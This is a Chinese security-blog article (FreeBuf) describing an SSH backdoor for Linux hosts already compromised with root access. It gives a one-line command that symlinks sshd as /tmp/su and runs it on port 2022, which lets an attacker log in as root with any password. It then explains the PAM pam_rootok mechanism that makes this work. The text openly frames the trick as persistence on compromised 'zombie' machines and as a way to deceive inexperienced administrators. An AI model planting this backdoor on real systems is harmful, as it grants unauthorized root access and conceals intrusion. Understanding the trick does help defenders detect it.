*本文原创作者：knpewg85942，本文属FreeBuf原创奖励计划，未经许可禁止转载

0x00. 引言

这是一个使用到了一点小伎俩的后门，如果渗透进入一个系统并拿到root权限的shell，对方防火墙没有限制，则可以通过本文的方法运行一个root可登陆且不需要权限的ssh后门。 这可以用来欺骗一些没有安全意识和经验的系统管理员可以在肉鸡上执行以下命令，运行这个ssh后门

ln -sf /usr/sbin/sshd /tmp/su;nohup /tmp/su -oPort=2022 &

然后打开一个新的登陆会话测试一下：

账户root， 密码随便填写

登陆成功

0x01. 为什么可以免密登陆

上面的后门运行的进程名是su,当用户登录的时候，会去/etc/pam.d/下寻找su文件（其实这里不一定要是su文件，只要/etc/pam.d 目录下存在和后门的进程名同名的文件，则系统在认证的时候就会去读取这个文件内容进行认证）， 内容参考如下（kali2 系统）

# # The PAM configuration file for the Shadow `su' service # # This allows root to su without passwords (normal operation) auth       sufficient pam_rootok.so # Uncomment this to force users to be a member of group root # before they can use `su'. You can also add "group=foo" # to the end of this line if you want to use a group other # than the default "root" (but this may have side effect of # denying "root" user, unless she's a member of "foo" or explicitly # permitted earlier by e.g. "sufficient pam_rootok.so"). # (Replaces the `SU_WHEEL_ONLY' option from login.defs) # auth       required   pam_wheel.so # Uncomment this if you want wheel members to be able to # su without a password. # auth       sufficient pam_wheel.so trust # Uncomment this if you want members of a specific group to not # be allowed to use su at all. # auth       required   pam_wheel.so deny group=nosu # Uncomment and edit /etc/security/time.conf if you need to set # time restrainst on su usage. # (Replaces the `PORTTIME_CHECKS_ENAB' option from login.defs # as well as /etc/porttime) # account    requisite  pam_time.so # This module parses environment configuration file(s) # and also allows you to use an extended config # file /etc/security/pam_env.conf. # # parsing /etc/environment needs "readenv=1" session       required   pam_env.so readenv=1 # locale variables are also kept into /etc/default/locale in etch # reading this file *in addition to /etc/environment* does not hurt session       required   pam_env.so readenv=1 envfile=/etc/default/locale # Defines the MAIL environment variable # However, userdel also needs MAIL_DIR and MAIL_FILE variables # in /etc/login.defs to make sure that removing a user # also removes the user's mail spool file. # See comments in /etc/login.defs # # "nopen" stands to avoid reporting new mail when su'ing to another user session    optional   pam_mail.so nopen # Sets up user limits according to /etc/security/limits.conf # (Replaces the use of /etc/limits in old login) session    required   pam_limits.so # The standard Unix authentication modules, used with # NIS (man nsswitch) as well as normal /etc/passwd and # /etc/shadow entries. @include common-auth @include common-account @include common-session

sufficient 表示只要这行满足，直接返回登录成功

好，我们再来看一下 Linux man 手册上关于 pam_rootok.so 的介绍

这个认证模块是认证你的UID是否为0，然后return pam的结果（0就ok，其他就不OK）。

再去看一下pam_rootok.so的源码，发现

关键点在于红框部分，模块会调用getuid()，如果get的uid为0，它会检查selinux的root是否为0或是否在启用selinux下为0，是0，则返回认证成功，否则认证失败。

那么getuid()是从哪里来的，查了一下：

也就是根据后门运行的进程userid来的， 只要后门进程是以userid 为0的用户运行，那么什么用户都可以免密登陆

换个普通用户试试